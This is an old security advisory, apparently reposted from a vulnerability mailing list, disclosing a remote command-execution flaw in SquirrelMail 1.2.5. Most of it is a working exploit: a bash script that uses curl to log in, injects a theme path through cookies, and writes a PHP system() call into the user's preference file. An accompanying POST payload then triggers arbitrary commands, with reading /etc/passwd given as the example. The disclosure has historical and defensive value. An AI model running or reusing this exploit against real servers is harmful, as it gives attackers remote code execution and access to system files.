Security Advisory: squirrelmail 1.2.5 email user can execute command

[EN] securityvulns.ru
no-pyccku

Related information
  squirellmail php bugs
  SquirrelMail v1.2.9 XSS bugs
  Squirrel Mail 1.2.7 XSS Exploit
  squirrelmail: squirrelspell plugin check_me.mod.php bug
  squirrelmail bug

From: pokleyzz sakamaniaka <pokleyzz_(at)_hotmail.com>
Date: 29.03.2002
Subject: squirrelmail 1.2.5 email user can execute command

email user can append $THEME variable through

cookies

---------------- start sq125x ---------------------

#!/bin/bash

#

# squirrelmail-1.2.5 remote execution by pokleyzz

http://www.inetd-secure.net

#

# usage   : ./sq125x themecount username password

url command

# example : ./sq125x 2 pokley 123456

http://mail.pokleyzz.my/mail "cat /etc/passwd"

#

# curl can be found at http://curl.haxx.se/libcurl/

#

export

PATH="/usr/bin:/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/l

ocal/sbin"

export CURL="/usr/bin/curl"

export USERNAME="$2"

export PASSWORD="$3"

export THEME_COUNT="$1"

export URL="$4"

export COMMAND=`echo $5|sed 's/\ /%20/g' -`

export TMPFILE="header.tmp"

export THEME="theme[${THEME_COUNT}][PATH]

=../data/${USERNAME}.pref; theme

[${THEME_COUNT}][NAME]=testing"

#step 1

sed "s/pokley/"$USERNAME"/g" post.txt >lame.txt

/bin/rm -rf ${TMPFILE}

$CURL -b "$THEME" -d

login_username=${USERNAME} -d

secretkey=${PASSWORD} -d

js_autodetect_results=0 -d just_logged_in=1 -D

${TMPFILE} ${URL}/src/redirect.php

export COOKIES=`cat ${TMPFILE} |grep Set-

Cookie|awk {'print $2'}|while read data;do printf '%b'

$data;done`

export COOKIES="${COOKIES} ${THEME}"

$CURL -b "$COOKIES" -d @lame.txt -o /tmp/.tmp --

silent ${URL}/src/options.php

#step 2

sleep 5s

$CURL -b "$THEME" -d

login_username=${USERNAME} -d

secretkey=${PASSWORD} -d

js_autodetect_results=0 -d just_logged_in=1 -D

${TMPFILE} ${URL}/src/redirect.php

export COOKIES=`cat ${TMPFILE} |grep Set-

Cookie|awk {'print $2'}|while read data;do printf '%b'

$data;done`

export COOKIES="${COOKIES} ${THEME}"

$CURL -b "$COOKIES" -d @lame.txt -o /tmp/.tmp --

silent ${URL}/src/options.php

$CURL -b "$COOKIES" ${URL}/src/left_main.php?

cmdd=${COMMAND}

$CURL -b "$COOKIES" -o /tmp/.tmp --silent

${URL}/src/signout.php

rm -rf lame.txt /tmp/.tmp

-------------- end sq125 ----------------------

-------------- start post.txt --------------------

optpage=display&optmode=submit&new_chosen_the

me=..%2Fdata%

2Fpokley.pref&new_custom_css=none&new_languag

e=&new_javascript_setting=2&new_js_autodetect_re

sults=1&new_show_num=15%0D%0A%3C%3F+%

0D%0Asystem%28%24cmdd%29%3B+%0D%0A%

3F%

3E&new_alt_index_colors=1&new_page_selector=1&

new_page_selector_max=10&new_wrap_at=86&new

_editor_size=76&new_location_of_buttons=between&

new_use_javascript_addr_book=0&new_show_html_

default=0&new_include_self_reply_all=1&new_show_

xmailer_default=0&new_attachment_common_show_

images=0&new_pf_subtle_link=1&new_pf_cleandispl

ay=0&new_mdn_user_support=1&new_compose_ne

w_win=0&delete_move_next_bi=on&delete_move_ne

xt_formATbottomi=on&submit_display=Submit

----------------------end post.txt --------------------------